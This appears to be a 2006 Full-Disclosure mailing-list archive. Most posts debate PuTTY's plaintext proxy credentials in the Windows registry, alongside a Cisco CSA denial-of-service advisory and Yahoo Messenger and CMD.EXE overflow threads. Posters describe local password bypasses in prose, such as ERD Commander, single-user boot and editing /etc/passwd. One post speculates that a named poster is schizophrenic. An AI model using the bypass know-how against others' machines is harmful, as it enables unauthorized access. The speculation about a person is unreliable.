Sorry, I shouldn't have implied that was only true of Windows. However, you CAN'T access encrypted data with physical drive access. Matt Flaschen >> Windows offers no security against local users. It is trivial to boot to >> a program like ERD Commander and replace admin passwords. On the other >> hand, PuTTy is meant to protect against everyone; that's why it doesn't >> allow saved passwords. Thus, this seems like a vulnerability to me. >> > Unix offers no security against local users either. If I can sit at the > console, I can login in single user mode, mount the drives rw and edit > /etc/passwd all day. > > Furthermore, I can take any hard drive, with any file system on it, and > with the right tools I can read everything on the drive, even deleted > stuff. > > So what's your point? That when you own the box you own the box? > > If you first have to own the box to get to the information, then it's > not a vulnerability. It's not best practice, but it's not a vulnerability. > > Paul Schmehl ([EMAIL PROTECTED]) > Senior Information Security Analyst > The University of Texas at Dallas > http://www.utdallas.edu/ir/security/ > > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE : Putty Proxy login/password discolsure....(Answer from PUTTY Staff)
Could use the same passphrase for the proxy password and SSH keys? Simon Tatham wrote: > Matthew Flaschen <[EMAIL PROTECTED]> wrote: > >> Why can't you generate the encryption key from a passphrase? > > Because requiring the user to type in their passphrase at the start > of the session in order to decrypt their proxy password is no more > convenient than requiring them to type in the proxy password > directly! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
Exactly. If you´ve managed to lost your root password, deal with the karma, does not make the system insecure by design with a "linux single" feature. Not that a lot of users don´t forget their passwords anyway. On Wed, 25 Oct 2006 23:57:15 +0530 Raj Mathur <[EMAIL PROTECTED]> wrote: RM> On Wednesday 25 October 2006 23:14, cardoso wrote: RM> > Exactly. A few years ago I used to deal with linux fanboys showing RM> > them the cute trick of "linux single" at boot time. After a few RM> > hours begging for the admin password, I teached the trick and they RM> > usually stopped the brag about how security Linux was. RM> RM> Can't do that in most modern distributions today -- they're configured RM> to ask for root password before they give a single-user shell. RM> RM> Not that there aren't other ways around that restriction... RM> RM> -- Raju RM> RM> > RM> > RM> > On Wed, 25 Oct 2006 12:34:49 -0500 RM> > Paul Schmehl <[EMAIL PROTECTED]> wrote: RM> > RM> > PS> --On Wednesday, October 25, 2006 10:24:11 -0400 RM> > [EMAIL PROTECTED] PS> wrote: RM> > PS> RM> > PS> > Windows offers no security against local users. It is RM> > trivial to boot to PS> > a program like ERD Commander and replace RM> > admin passwords. On the other PS> > hand, PuTTy is meant to RM> > protect against everyone; that's why it doesn't PS> > allow saved RM> > passwords. Thus, this seems like a vulnerability to me. PS> > RM> > PS> Unix offers no security against local users either. If I can RM> > sit at the PS> console, I can login in single user mode, mount the RM> > drives rw and edit PS> /etc/passwd all day. RM> > PS> RM> > PS> Furthermore, I can take any hard drive, with any file system on RM> > it, and PS> with the right tools I can read everything on the RM> > drive, even deleted stuff. PS> RM> > PS> So what's your point? That when you own the box you own the RM> > box? PS> RM> > PS> If you first have to own the box to get to the information, RM> > then it's not a PS> vulnerability. It's not best practice, but RM> > it's not a vulnerability. PS> RM> RM> -- RM> Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/ RM> GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F RM> It is the mind that moves RM> RM> ___ RM> Full-Disclosure - We believe in it. RM> Charter: http://lists.grok.org.uk/full-disclosure-charter.html RM> Hosted and sponsored by Secunia - http://secunia.com/ RM> - Carlos Cardoso http://www.carloscardoso.com <== blog semi-pessoal http://www.contraditorium.com <== ProBlogging e cultura digital "You lost today, kid. But that doesn't mean you have to like it" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
On Wednesday 25 October 2006 23:14, cardoso wrote: > Exactly. A few years ago I used to deal with linux fanboys showing > them the cute trick of "linux single" at boot time. After a few > hours begging for the admin password, I teached the trick and they > usually stopped the brag about how security Linux was. Can't do that in most modern distributions today -- they're configured to ask for root password before they give a single-user shell. Not that there aren't other ways around that restriction... -- Raju > > > On Wed, 25 Oct 2006 12:34:49 -0500 > Paul Schmehl <[EMAIL PROTECTED]> wrote: > > PS> --On Wednesday, October 25, 2006 10:24:11 -0400 > [EMAIL PROTECTED] PS> wrote: > PS> > PS> > Windows offers no security against local users. It is > trivial to boot to PS> > a program like ERD Commander and replace > admin passwords. On the other PS> > hand, PuTTy is meant to > protect against everyone; that's why it doesn't PS> > allow saved > passwords. Thus, this seems like a vulnerability to me. PS> > > PS> Unix offers no security against local users either. If I can > sit at the PS> console, I can login in single user mode, mount the > drives rw and edit PS> /etc/passwd all day. > PS> > PS> Furthermore, I can take any hard drive, with any file system on > it, and PS> with the right tools I can read everything on the > drive, even deleted stuff. PS> > PS> So what's your point? That when you own the box you own the > box? PS> > PS> If you first have to own the box to get to the information, > then it's not a PS> vulnerability. It's not best practice, but > it's not a vulnerability. PS> -- Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/ GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F It is the mind that moves ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
Exactly. A few years ago I used to deal with linux fanboys showing them the cute trick of "linux single" at boot time. After a few hours begging for the admin password, I teached the trick and they usually stopped the brag about how security Linux was. On Wed, 25 Oct 2006 12:34:49 -0500 Paul Schmehl <[EMAIL PROTECTED]> wrote: PS> --On Wednesday, October 25, 2006 10:24:11 -0400 [EMAIL PROTECTED] PS> wrote: PS> PS> > Windows offers no security against local users. It is trivial to boot to PS> > a program like ERD Commander and replace admin passwords. On the other PS> > hand, PuTTy is meant to protect against everyone; that's why it doesn't PS> > allow saved passwords. Thus, this seems like a vulnerability to me. PS> > PS> Unix offers no security against local users either. If I can sit at the PS> console, I can login in single user mode, mount the drives rw and edit PS> /etc/passwd all day. PS> PS> Furthermore, I can take any hard drive, with any file system on it, and PS> with the right tools I can read everything on the drive, even deleted stuff. PS> PS> So what's your point? That when you own the box you own the box? PS> PS> If you first have to own the box to get to the information, then it's not a PS> vulnerability. It's not best practice, but it's not a vulnerability. PS> PS> Paul Schmehl ([EMAIL PROTECTED]) PS> Senior Information Security Analyst PS> The University of Texas at Dallas PS> http://www.utdallas.edu/ir/security/ - Carlos Cardoso http://www.carloscardoso.com <== blog semi-pessoal http://www.contraditorium.com <== ProBlogging e cultura digital "You lost today, kid. But that doesn't mean you have to like it" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
--On Wednesday, October 25, 2006 10:24:11 -0400 [EMAIL PROTECTED] wrote: Windows offers no security against local users. It is trivial to boot to a program like ERD Commander and replace admin passwords. On the other hand, PuTTy is meant to protect against everyone; that's why it doesn't allow saved passwords. Thus, this seems like a vulnerability to me. Unix offers no security against local users either. If I can sit at the console, I can login in single user mode, mount the drives rw and edit /etc/passwd all day. Furthermore, I can take any hard drive, with any file system on it, and with the right tools I can read everything on the drive, even deleted stuff. So what's your point? That when you own the box you own the box? If you first have to own the box to get to the information, then it's not a vulnerability. It's not best practice, but it's not a vulnerability. Paul Schmehl ([EMAIL PROTECTED]) Senior Information Security Analyst The University of Texas at Dallas http://www.utdallas.edu/ir/security/ p7sPfZCvi7XvD.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: Cisco Security Agent for Linux Port Scan Denial of Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco Security Agent for Linux Port Scan Denial of Service Advisory ID: cisco-sa-20061025-csa http://www.cisco.com/warp/public/707/cisco-sa-20061025-csa.shtml Revision 1.0 For Public Release 2006 October 25 1600 UTC (GMT) +- Summary === Cisco Security Agent (CSA) for Linux contains a denial of service vulnerability involving port scans. By performing a port scan against a system running a vulnerable version of CSA, it is possible to cause the system to become unresponsive. Cisco Unified CallManager (CUCM) and Cisco Unified Presence Server (CUPS) ship with a vulnerable CSA version. There are workarounds for this vulnerability. Cisco has made free software available to address this vulnerability for affected customers. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20061025-csa.shtml Affected Products = Vulnerable Products +-- The following CSA versions are vulnerable to the port scanning issue: * CSA version 4.5 for Linux (standalone and managed) prior to Hotfix 4.5.1.657 * CSA version 5.0 for Linux (standalone and managed) prior to Hotfix 5.0.0.193 The following Cisco products include a standalone CSA for Linux version which are also vulnerable to this issue: * Cisco Unified CallManager (CUCM) 5.0 versions including 5.0(4) * Cisco Unified Presence Server (CUPS) 1.0 versions including 1.0(2) Products Confirmed Not Vulnerable + The following CSA Agent versions are not vulnerable to the port scanning issue: * CSA version 5.1 (standalone and managed) for Linux * All CSA versions (standalone and managed) for Windows * All CSA versions (standalone and managed) for Solaris No other Cisco products are currently known to be affected by this vulnerability. Details === Cisco Security Agent (CSA) provides threat protection for server and desktop computing systems. CSA for Linux is vulnerable to a denial of service attack that may be triggered during the identification of network port scans. By running a port scan with specific options, it is possible to cause excessive system resource consumption resulting in a denial of service. It is possible to mitigate this vulnerability by restricting network access to vulnerable systems to trusted networks. This issue is not a Linux operating system issue. CSA versions for other operating systems (Windows, Solaris) are not affected by this vulnerability. This issue is documented in Cisco Bug ID CSCse98684. Cisco Unified CallManager 5.0 versions, including 5.0(4), ship with a vulnerable version of CSA. A new CallManager Options Package (COP) file is available to update the CSA version on CallManager 5.0(4). Future versions of CallManager will include the updated CSA version. This issue is documented in Cisco Bug ID CSCse97601. Cisco Unified Presence Server 1.0 versions, including 1.0(2), ship with a vulnerable version of CSA. A new COP file is available to update the CSA version on CUPS 1.0(2). Future versions of CUPS will include the updated CSA version. This issue is documented in Cisco Bug ID CSCsg40052. Impact == Successful exploitation of the port scan vulnerability against a Linux system running a vulnerable version of CSA may cause the system to become unresponsive due to resource exhaustion while a port scan is underway. This may result in the failure of critical processes and remote network connectivity. Repeated port scans may result in a prolonged denial of service. If a CUCM or CUPS system running a vulnerable CSA version is scanned, voice operations may become unavailable for the duration of the port scan. Software Version and Fixes == When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center ("TAC") or your contracted maintenance provider for assistance. CSA for Linux + +---+ | Affected Software | Fixed Software | | Version | Version | |-+-| | CSA Hotfix prior to | CSA Hotfix | | 4.5.1.657 | 4.5.1.657 | |-+-| | CSA Hotfix prior to | CSA Hotfix | | 5.0.0.193 | 5.0.0.194 * | +---+ * CSA Hotfix 5.0.0.194 deprecates CSA Hotfix 5.0.0.193. Fixed CSA software can be downloaded at http://www.cisco.com/cgi-bin/tablebuild.pl/cs
Re: [Full-disclosure] Putty Proxy login/password discolsure....
Windows offers no security against local users. It is trivial to boot to a program like ERD Commander and replace admin passwords. On the other hand, PuTTy is meant to protect against everyone; that's why it doesn't allow saved passwords. Thus, this seems like a vulnerability to me. Matt Flaschen Quoting "Dave \"No, not that one\" Korn" <[EMAIL PROTECTED]>: > "Antoine SANTO" <[EMAIL PROTECTED]> wrote in message > news:[EMAIL PROTECTED] > > > Hi, > > > > I come to report a little strange discolsure discovered by my > > co-worker Fx0day. > > > > When you save session informations under putty and you need proxy > > for a session, > > We can find in plain clear text the login and password proxy auth in > > the windows > > database register. > > > > Strange to see a good ssh client storing plain clear text « hot » > > informations !! > >The HKCU key is protected by an ACL; it is only accessible to the > user, or to someone with admin rights. So it's not best practice, > agreed, but it isn't a major vulnerability. > > > cheers, >DaveK > -- > Can't think of a witty .sigline today > > > > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE : Putty Proxy login/password discolsure....(Answer from PUTTY Staff)
Why can't you generate the encryption key from a passphrase? Matthew Flaschen Antoine SANTO wrote: >> Hi, >> >> I come to report a little strange discolsure discovered by my >> co-worker Fx0day. >> >> When you save session informations under putty and you need proxy >> for a session, >> We can find in plain clear text the login and password proxy auth in >> the windows >> database register. >> >> Strange to see a good ssh client storing plain clear text < hot > >> informations !! > > Unfortunately, there's no way to encrypt it securely, because there's > nowhere safe to store an encryption key. > > Cheers, > Simon ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] RE : Putty Proxy login/password discolsure....(Answer from PUTTY Staff)
> Hi, > > I come to report a little strange discolsure discovered by my > co-worker Fx0day. > > When you save session informations under putty and you need proxy > for a session, > We can find in plain clear text the login and password proxy auth in > the windows > database register. > > Strange to see a good ssh client storing plain clear text < hot > > informations !! Unfortunately, there's no way to encrypt it securely, because there's nowhere safe to store an encryption key. Cheers, Simon -- Simon Tatham "A cynic is a person who smells flowers and <[EMAIL PROTECTED]>immediately looks around for a coffin." ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
"Antoine SANTO" <[EMAIL PROTECTED]> wrote in message news:[EMAIL PROTECTED] > Hi, > > I come to report a little strange discolsure discovered by my > co-worker Fx0day. > > When you save session informations under putty and you need proxy > for a session, > We can find in plain clear text the login and password proxy auth in > the windows > database register. > > Strange to see a good ssh client storing plain clear text « hot » > informations !! The HKCU key is protected by an ACL; it is only accessible to the user, or to someone with admin rights. So it's not best practice, agreed, but it isn't a major vulnerability. cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE : Putty Proxy login/password discolsure....
Did you report the finding to the author, so he can fix this issue? Heiko On Wed, October 25, 2006 07:15, Antoine SANTO wrote: > For information i use Version 0.58 thats seems to be the latest > release. > > > > Cordialement > Antoine SANTO > > > > > _ > > > Antoine SANTO > Administration Réseaux et Securité > MAAF Assurances Europex > > > > > > > > -Message d'origine- > De : [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] De la part de Antoine > SANTO > Envoyé : mercredi 25 octobre 2006 12:45 > À : full-disclosure@lists.grok.org.uk > Objet : [Full-disclosure] Putty Proxy login/password discolsure > > > > > Hi, > > > > > I come to report a little strange discolsure discovered by my co-worker > Fx0day. > > > > > When you save session informations under putty and you need proxy for a > session, > > We can find in plain clear text the login and password proxy auth in the > windows database register. > > > > Strange to see a good ssh client storing plain clear text « hot » > informations !! > > > > > > Cordialement > Antoine SANTO > > > > > _ > > > Antoine SANTO > Administration Réseaux et Securité > MAAF Assurances Europex > > > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- Regards Heiko Zuerker http://www.devil-linux.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows Command Processor CMD.EXEBufferOverflow
Peter Ferrie wrote: >>> file:// >>> ? >> >> OK, I'll bite. Why are file:// URLs relevant to the discussion? > > It allows arbitrary data to be passed to CMD.EXE, without first > owning the system. No it doesn't. It passes arbitrary data to the windows gui shell exec function. It doesn't invoke cmd.exe. Unless you have an actual working example? cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [funsec] Who is n3td3v?
Dr. Neal Krawetz said: "The older n3td3v postings were by 3 people, not one person." --- While I like the fact someones analysed all this and come to a conclusion, I believe its the wrong conclusion. In my opinion n3td3v was always one person. He's Scottish from Edinburgh, posted in various states of mind ranging from straight headed, to blindly drunk. Also you have to take into consideration that he could be a paranoid schizophrenic. OK so I'm no doctor or personality analyst, but it did look that way sometimes. Also, the impression that there are more than one person was only ever given by himself. Starting a google group means fuck all, all I ever saw was listings of posts on all the mailing lists. That means nothing. I could start the colweb group now on google and claim to be a group of security specialists, doesnt mean its true. Also there was a couple of instances where people impersonated him, so that might muddy the water somewhat. Also didnt help that he used 2 or 3 email addresses from time to time to get past blocking. So I stick to my personal opinion of the great man - 1. One person 2. Good intentions overall 3. Not great communication skills (depends how drunk he is) 4. Too paranoid for his own good 5. Living in Ediburgh 6. Most likely Scottish Cheers. Col. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] RE : Putty Proxy login/password discolsure....
For information i use Version 0.58 that’s seems to be the latest release. Cordialement Antoine SANTO Antoine SANTO Administration Réseaux et Securité MAAF Assurances – Europex -Message d'origine- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] De la part de Antoine SANTO Envoyé : mercredi 25 octobre 2006 12:45 À : full-disclosure@lists.grok.org.uk Objet : [Full-disclosure] Putty Proxy login/password discolsure Hi, I come to report a little strange discolsure discovered by my co-worker Fx0day. When you save session informations under putty and you need proxy for a session, We can find in plain clear text the login and password proxy auth in the windows database register. Strange to see a good ssh client storing plain clear text « hot » informations !! Cordialement Antoine SANTO Antoine SANTO Administration Réseaux et Securité MAAF Assurances – Europex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability
> > Does anyone have more information on this issue? > Yes. SecuriTeam is currently assisting a researcher with reporting this issue to Yahoo! security. Yahoo! security responded in record time, as they often do, and are working to resolve this potential security vulnerability. An official report with full credit to the researcher who discovered it will be released when the incident has been resolved. A similar vulnerability was reported on the mailing lists a few months ago, which has not been fixed. SecuriTeam assisted the researcher and Yahoo! responded and fixed the issue in a matter of a day. Yahoo! are very capable with security vulnerabilities in their software. Thanks, Gadi. > snip > http://www.securityfocus.com/bid/20625/discuss > Yahoo! Messenger is prone to a remote buffer-overflow vulnerability > because it fails to properly bounds-check user-supplied data before > copying it to an insufficiently sized memory buffer. > > This vulnerability allows remote attackers to execute arbitrary machine > code in the context of the affected application. Failed exploit attempts > will likely crash the server, denying further service to legitimate > users. > > Yahoo! Messenger 8 with Voice is vulnerable. > snip > > > I could not find this vulnerability reported on any other place than > bugtraq (say Secunia, iDefense, ISC). > > > Thanks, > > - Siddhartha > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Putty Proxy login/password discolsure....
Hi, I come to report a little strange discolsure discovered by my co-worker Fx0day. When you save session informations under putty and you need proxy for a session, We can find in plain clear text the login and password proxy auth in the windows database register. Strange to see a good ssh client storing plain clear text « hot » informations !! Cordialement Antoine SANTO Antoine SANTO Administration Réseaux et Securité MAAF Assurances – Europex putty_hole.gif Description: GIF image ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/